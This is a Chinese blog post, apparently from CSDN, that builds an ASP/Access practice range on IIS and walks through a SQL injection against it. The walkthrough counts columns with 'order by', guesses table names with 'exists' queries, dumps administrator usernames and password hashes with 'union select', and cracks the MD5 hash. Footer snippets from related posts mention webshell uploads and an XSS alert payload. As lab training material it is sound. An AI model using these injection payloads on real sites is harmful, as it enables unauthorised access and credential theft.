Access靶场搭建>靶场通关> 附IIS环境搭建

已于 2024-08-20 19:39:18 修改
阅读量643 收藏 12
点赞数 21
文章标签: 服务器 运维
于 2024-08-20 19:38:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nai_zui_jiang/article/details/141365861
版权

靶场·搭建

首先启动 IIS 服务器,并浏览根目录(这里给大家上传了靶场资源压缩包)

https://download.csdn.net/download/Nai_zui_jiang/89654172?spm=1001.2014.3001.5503icon-default.png?t=N7T8https://download.csdn.net/download/Nai_zui_jiang/89654172?spm=1001.2014.3001.5503

把NZ.zip解压到放www.root根目录下,这里我已经放进去了

解压完成后,回到iis服务器点击绑定来绑定服务器地址,要不然访问本机ip访问不到

选择本机wlan 或者eth0 或者随机⼀个⽹卡的ip都⾏
然后去浏览器访问绑定的ip地址/index.asp
⾄此,环境搭建结束

IIS环境搭建

        如果大家没有IIS环境,那么这里给大家说一说IIS环境的搭建

打开控制面板,点击程序

进去后启用或关闭windows功能

我们需要打开这些功能

靶场实战

 打开网站后在首页点击新闻中心,然后任意点一个新闻

输入order by 7,页面显示正常,order by 8 显示页面异常,说明有七列

因为这个是MSSQL数据库,他没有库,只有表,所以这里我们就跳过了查询库名的过程

用下面这条语句来猜测表名

news_view.asp?id=11 and exists(select * from 表名 )
下面两条分别是从admin表和users表中查询数据,如果页面异常,则说明不存在此表
news_view.asp?id=11 and exists(select * from admin)
news_view.asp?id=11 and exists(select * from users)
页面异常,不存在此表
news_view.asp?id=11 and exists(select * from administrator) 
这个表页面正常,说明我们查到数据了

接下来我们就可以猜测字段名了

news_view.asp?id=-1 union select 1,user_name,3,4,5,6,7 from administrator
页面成功回显,存在此列
接下来用回显点3去回显他的密码
news_view.asp?id= -1 union select 1,user_name,password,4,5,6,7 from administrator
这里我们成功得到密码,我们用 md5去解密一下得到密码admin, 并去后台登录 后台地址爆破出来
嘤嘤奶嘴酱
关注
靶场日记-文件上传漏洞以及IIS 6.0解析漏洞的利用
Fengsheng96的博客
09-08 361
靶场环境 解题思路 通读题目得知修改管理员cookie进入后台,上传shell,Flag在web根目录(flag.php),解决问题,管理员cookie藏在上题通过xss获取的cookie信息中。 查看xss获取的cookie信息,发现管理员cookie藏在其中 通过cookiemanager修改为管理员cookie点击进入后台 发现环境是asp的,中间件是IIs6.0的,可能存在解析漏洞,以*.asp、.asa、.cer命名的文件夹里的文件都将会被当成ASP文件执行。能直接解析cer文件。 发现
安全入门第五天
xuanyulevel6的博客
08-21 758
笔记
windows server2003搭建asp注入靶场详细过程
守卫者安全
04-02 2228
本文演示一下关于在windows server2003系统下安装IIS服务,并搭建asp+access靶场环境 这里默认已经安装好了windows server2003系统的虚拟机环境 先查看一下本机ip地址:192.168.1.11 一、安装IIS服务 先点击“管理您的服务器” 在弹出界面中选择添加或删除角色 点击之后弹出服务器配置向导 点击下一步之后显示如下 ...
Web安全漏洞的靶场演示
m0re's blog
08-15 1万+
命令执行漏洞 一般查看home目录,挖掘用户信息:ls -alh /home 查看具体用户的目录:ls -alh /home/用户名/ 查看系统信息:uname -a 利用ssh命令执行root权限命令 使用ssh 用户名@localhost通过ssh登录服务器是不需要身份验证的; 比如查看bill用户sudo命令的权限:ssh bill@localhost sudo -l ubuntu自带防火墙,所以关闭防火墙方便后面的操作。 ssh bill@localhost sudo ufw disable 反弹
iis6.0版本的解析漏洞复现
Alonegrief的博客
12-10 1143
这里复现iis6.0服务器的文件解析漏洞采用墨者学院的靶场,来进行复现 目录解析: 启动靶场,访问该地址,F12,查看他的头部信息,发现他是iis6.0版本的 既然是iis6.0版本的服务器,我们可以考虑iis6.0的两个漏洞: 1、 目录解析 2、 文件解析 先上传一个文件上去,观察url的变化 发现页面是一个asp页面,在电脑上面创建一个asp的一句话木马,然后用bp抓包修改数据包,在upload后面加入webshell.asp文件名,使服务器创建一个webshell.asp文件,这样子的目的是为了使
红日靶场通关笔记)
awonderfulrty的博客
08-30 616
SELECT '
Upload-labs 1-21关 靶场通关笔记(含代码审计)
weixin_54894046的博客
10-15 9417
Upload-labs 1-21关 靶场通关笔记(含代码审计)
bwapp通关教程
qq_45756971的博客
11-01 6393
** HTML Injection - Reflected (GET) ** low: 低级漏洞中,输入数据没有做校验 First name: <script>alert( 'xss' )</script> Last name: <script>alert( 'xss' )</script> 出现xss即为成功。 medium 和low一样,但发现被全部显示 抓包,会发现符号<>均被编码 0,1,2分别对应三个等级 找见对应的/bWAPP/bw
[网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)
热门推荐
杨秀璋的专栏
01-15 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台注册过程,以及Web渗透三道入门题目,包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。这篇文章将通过两个题目分享DirBuster扫描目录、Fuzzy爆破指定路径名称,通过Sqlmap工具实现SQL注入并获取管理员用户名和密码、文件下载等用法。希望您喜欢~
Access 靶场环境搭建
08-20
这里就是我们的 Access 靶场资源文件了,只需要我们把zip文件下载下来,并解压就好 ,内包含各种漏洞练习,适用于教育和测试安全专业人员以及开发者的网络安全技能。
DVWA靶场搭建教程,网站搭建
09-06
【DVWA靶场搭建教程,网站搭建】 DVWA(Damn Vulnerable Web Application)是一个非常流行的在线安全学习平台,用于教育和测试网络安全技能。这个靶场包含了一系列不同级别的漏洞,如SQL注入、XSS攻击、文件包含等...
靶场环境搭建
qq_21696621的博客
10-24 2154
一、安装VM虚拟机(本人使用VMware Workstation Pro 15.5.0 build-14665864) 二、下载win10镜像并创建好虚拟机(cn_windows_10_multiple_editions_x64_dvd_6848463.iso)https://msdn.itellyou.cn/ 三、在win10虚拟机安装phpstudy_pro(php集成环境)、aspweb...
统信服务器操作系统【Cron定时任务服务】
RZer的博客
09-23 1245
Cron定时任务服务服务介绍、服务管理、服务配置
awk 切割字符串 shell linux
abc
09-24 333
shell linux awk 切割字符串。
服务器操作系统【sar 命令】
RZer的博客
09-23 1183
sar 安装、语法参数说明以及示例
统信服务器操作系统进入【单用户模式】
RZer的博客
09-23 1196
统信服务器操作系统D版、E版、A版进入单用户模式的方式。
FTP 服务器 linux安装
最新发布
weixin_45368812的博客
09-25 1023
ftp 连接失败:500 OOPS: vsftpd: refusing to run with writable root inside chroot()ftp 连接失败:530 permission deniedftp 连接成功,但是能访问到上级目录和其他目录提示:以下是本篇文章正文内容,下面案例可供参考注意: 以下全部操作都是基于 SELinux= disable、防火墙关闭。
IIS+asp+access靶场
07-11
你想了解关于IIS、ASP和Access靶场的内容吗?这些技术和工具通常用于Web应用程序的开发和测试。ASP是一种用于构建动态Web应用程序的服务器端脚本语言,IIS(Internet Information Services)是运行在Windows操作系统上的Web服务器软件,而Access是一种关系型数据库管理系统。 关于IIS、ASP和Access靶场,您可以尝试搜索相关的在线资源,如教程、实验室或演示项目,这些资源可以帮助您熟悉和学习如何使用这些技术进行开发和测试。请注意,使用靶场进行测试时,确保您遵守相关法律法规,并只在授权的环境中进行实验和测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值